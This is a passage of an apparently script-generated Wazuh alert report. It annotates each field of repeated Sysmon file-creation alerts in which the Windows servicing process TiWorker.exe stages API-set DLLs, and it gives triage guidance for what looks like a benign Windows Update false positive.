True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.713298
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event, here Microsoft-Windows-Sysmon. It decides which schema eventID is read against (Sysmon's, not the Security log's).

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's. Handy when filtering raw EVTX/ETW data where the provider name is absent.

data.win.system.eventID:  11
Windows Event ID. In the Security log these are the classic 4624/4688 IDs; in the Microsoft-Windows-Sysmon/Operational channel (this alert) 11 = FileCreate, so read it against Sysmon's event table, not the Security-log one.

data.win.system.version:  2
Version of the event's schema/template. Sysmon bumps it when fields change; only matters if a decoder stops matching.

data.win.system.level:  4
Numeric Windows event level: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose. Sysmon logs every match at 4, so this carries no signal on its own.

data.win.system.task:  11
Task category number. Security-log events map it to names (Logon, Policy Change); Sysmon simply mirrors the event ID, so 11 = File created.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.3162385Z
UTC time the endpoint wrote the event, i.e. when the file was actually created. Here it is 2025-04-20, four days before the Wazuh timestamp above: build the timeline from this field, not from the alert time.

data.win.system.eventRecordID:  260644
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, the Sysmon service (3712 in every event here), NOT the process that created the file. The writer's PID is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the logging (Sysmon) process that wrote the record. Forensic detail only.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Windows Event Log channel the record came from. Microsoft-Windows-Sysmon/Operational means field semantics follow the Sysmon schema, not the Security log.

data.win.system.computer:  Attacker
Computer name the endpoint reported inside the event. Should equal agent.name; a mismatch points to a renamed host or a forwarded/relayed log.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.313 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-processenvironment-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.313 User: NT AUTHORITY\SYSTEM"
The full rendered Sysmon text, flattened onto one line by the Wazuh agent. It carries the same fields as data.win.eventdata.* below; fall back to it when a decoded field looks truncated or mangled.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.313
Sysmon's own UTC timestamp for the event, millisecond precision. Should agree with data.win.system.systemTime to within a few ms.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
Sysmon's GUID for the creating process: stable for the process lifetime and unique even after PID reuse. Pivot on it to find the matching Event ID 1 (process create) and every other file/network event from the same process; all alerts in this burst share one GUID, i.e. one process.

data.win.eventdata.processId:  12512
PID of the process that created the file. PIDs are recycled, so correlate on processGuid rather than on this number.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
Full path of the process that created the file. Here it is TiWorker.exe (Windows Modules Installer worker) loaded from a WinSxS servicing-stack directory, the expected writer while Windows Update is staging files. Confirm the path and Authenticode signature on the host before calling it benign; a TiWorker.exe anywhere else is a different case.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-processenvironment-l1-1-0.dll
Path of the file that was created: an api-ms-win-* API-set stub DLL staged under C:\Windows\Temp\SSS_… by the servicing stack. Being under C:\Windows is what tripped rule 92217; the rule does not distinguish the servicing stack from an attacker's drop.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.313
Creation timestamp carried by the file itself. Normally equals utcTime (within a few ms, as here); a much older value means a copied file kept its original timestamp or was backdated.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
Account the creating process ran as. NT AUTHORITY\SYSTEM is expected for the servicing stack; the same write by an interactive user account would deserve far more attention.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.601+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[T1570 Lateral Tool Transfer] No playbook entry yet; triage from the fields below. The writer is TiWorker.exe loaded from a WinSxS servicing-stack directory, running as NT AUTHORITY\SYSTEM, and the target is an api-ms-win-* DLL under C:\Windows\Temp\SSS_…, which is what the servicing stack does while Windows Update stages a package. Before closing as benign, confirm on the endpoint that that TiWorker.exe path exists with a valid Microsoft Authenticode signature and that a servicing/update run was in progress at data.win.system.systemTime; escalate if the writer is any other binary or account.

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.601+0000
When the Wazuh manager raised the alert, not when the event happened. Here it is 2025-04-24 while data.win.system.systemTime is 2025-04-20, roughly four days of ingestion lag, so anchor the timeline on systemTime and treat this as the processing time.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  32
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.716444
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event, here Microsoft-Windows-Sysmon. It decides which schema eventID is read against (Sysmon's, not the Security log's).

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's. Handy when filtering raw EVTX/ETW data where the provider name is absent.

data.win.system.eventID:  11
Windows Event ID. In the Security log these are the classic 4624/4688 IDs; in the Microsoft-Windows-Sysmon/Operational channel (this alert) 11 = FileCreate, so read it against Sysmon's event table, not the Security-log one.

data.win.system.version:  2
Version of the event's schema/template. Sysmon bumps it when fields change; only matters if a decoder stops matching.

data.win.system.level:  4
Numeric Windows event level: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose. Sysmon logs every match at 4, so this carries no signal on its own.

data.win.system.task:  11
Task category number. Security-log events map it to names (Logon, Policy Change); Sysmon simply mirrors the event ID, so 11 = File created.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.3496143Z
UTC time the endpoint wrote the event, i.e. when the file was actually created. Here it is 2025-04-20, four days before the Wazuh timestamp above: build the timeline from this field, not from the alert time.

data.win.system.eventRecordID:  260657
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, the Sysmon service (3712 in every event here), NOT the process that created the file. The writer's PID is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the logging (Sysmon) process that wrote the record. Forensic detail only.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Windows Event Log channel the record came from. Microsoft-Windows-Sysmon/Operational means field semantics follow the Sysmon schema, not the Security log.

data.win.system.computer:  Attacker
Computer name the endpoint reported inside the event. Should equal agent.name; a mismatch points to a renamed host or a forwarded/relayed log.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.348 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-shutdown-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.348 User: NT AUTHORITY\SYSTEM"
The full rendered Sysmon text, flattened onto one line by the Wazuh agent. It carries the same fields as data.win.eventdata.* below; fall back to it when a decoded field looks truncated or mangled.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.348
Sysmon's own UTC timestamp for the event, millisecond precision. Should agree with data.win.system.systemTime to within a few ms.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
Sysmon's GUID for the creating process: stable for the process lifetime and unique even after PID reuse. Pivot on it to find the matching Event ID 1 (process create) and every other file/network event from the same process; all alerts in this burst share one GUID, i.e. one process.

data.win.eventdata.processId:  12512
PID of the process that created the file. PIDs are recycled, so correlate on processGuid rather than on this number.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
Full path of the process that created the file. Here it is TiWorker.exe (Windows Modules Installer worker) loaded from a WinSxS servicing-stack directory, the expected writer while Windows Update is staging files. Confirm the path and Authenticode signature on the host before calling it benign; a TiWorker.exe anywhere else is a different case.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-shutdown-l1-1-0.dll
Path of the file that was created: an api-ms-win-* API-set stub DLL staged under C:\Windows\Temp\SSS_… by the servicing stack. Being under C:\Windows is what tripped rule 92217; the rule does not distinguish the servicing stack from an attacker's drop.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.348
Creation timestamp carried by the file itself. Normally equals utcTime (within a few ms, as here); a much older value means a copied file kept its original timestamp or was backdated.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
Account the creating process ran as. NT AUTHORITY\SYSTEM is expected for the servicing stack; the same write by an interactive user account would deserve far more attention.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.601+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[T1570 Lateral Tool Transfer] No playbook entry yet; triage from the fields below. The writer is TiWorker.exe loaded from a WinSxS servicing-stack directory, running as NT AUTHORITY\SYSTEM, and the target is an api-ms-win-* DLL under C:\Windows\Temp\SSS_…, which is what the servicing stack does while Windows Update stages a package. Before closing as benign, confirm on the endpoint that that TiWorker.exe path exists with a valid Microsoft Authenticode signature and that a servicing/update run was in progress at data.win.system.systemTime; escalate if the writer is any other binary or account.

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.601+0000
When the Wazuh manager raised the alert, not when the event happened. Here it is 2025-04-24 while data.win.system.systemTime is 2025-04-20, roughly four days of ingestion lag, so anchor the timeline on systemTime and treat this as the processing time.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  33
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.719550
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event, here Microsoft-Windows-Sysmon. It decides which schema eventID is read against (Sysmon's, not the Security log's).

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's. Handy when filtering raw EVTX/ETW data where the provider name is absent.

data.win.system.eventID:  11
Windows Event ID. In the Security log these are the classic 4624/4688 IDs; in the Microsoft-Windows-Sysmon/Operational channel (this alert) 11 = FileCreate, so read it against Sysmon's event table, not the Security-log one.

data.win.system.version:  2
Version of the event's schema/template. Sysmon bumps it when fields change; only matters if a decoder stops matching.

data.win.system.level:  4
Numeric Windows event level: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose. Sysmon logs every match at 4, so this carries no signal on its own.

data.win.system.task:  11
Task category number. Security-log events map it to names (Logon, Policy Change); Sysmon simply mirrors the event ID, so 11 = File created.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.3842941Z
UTC time the endpoint wrote the event, i.e. when the file was actually created. Here it is 2025-04-20, four days before the Wazuh timestamp above: build the timeline from this field, not from the alert time.

data.win.system.eventRecordID:  260671
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, the Sysmon service (3712 in every event here), NOT the process that created the file. The writer's PID is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the logging (Sysmon) process that wrote the record. Forensic detail only.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Windows Event Log channel the record came from. Microsoft-Windows-Sysmon/Operational means field semantics follow the Sysmon schema, not the Security log.

data.win.system.computer:  Attacker
Computer name the endpoint reported inside the event. Should equal agent.name; a mismatch points to a renamed host or a forwarded/relayed log.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.382 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-timezone-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.382 User: NT AUTHORITY\SYSTEM"
The full rendered Sysmon text, flattened onto one line by the Wazuh agent. It carries the same fields as data.win.eventdata.* below; fall back to it when a decoded field looks truncated or mangled.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.382
Sysmon's own UTC timestamp for the event, millisecond precision. Should agree with data.win.system.systemTime to within a few ms.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
Sysmon's GUID for the creating process: stable for the process lifetime and unique even after PID reuse. Pivot on it to find the matching Event ID 1 (process create) and every other file/network event from the same process; all alerts in this burst share one GUID, i.e. one process.

data.win.eventdata.processId:  12512
PID of the process that created the file. PIDs are recycled, so correlate on processGuid rather than on this number.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
Full path of the process that created the file. Here it is TiWorker.exe (Windows Modules Installer worker) loaded from a WinSxS servicing-stack directory, the expected writer while Windows Update is staging files. Confirm the path and Authenticode signature on the host before calling it benign; a TiWorker.exe anywhere else is a different case.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-timezone-l1-1-0.dll
Path of the file that was created: an api-ms-win-* API-set stub DLL staged under C:\Windows\Temp\SSS_… by the servicing stack. Being under C:\Windows is what tripped rule 92217; the rule does not distinguish the servicing stack from an attacker's drop.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.382
Creation timestamp carried by the file itself. Normally equals utcTime (within a few ms, as here); a much older value means a copied file kept its original timestamp or was backdated.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
Account the creating process ran as. NT AUTHORITY\SYSTEM is expected for the servicing stack; the same write by an interactive user account would deserve far more attention.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.612+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.612+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  34
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.722656
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.4134132Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260684
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.412 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-crt-math-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.412 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.412
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-crt-math-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.412
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.628+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.628+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  35
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.725742
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.4327048Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260692
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.431 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-crt-utility-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.431 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.431
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-crt-utility-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.431
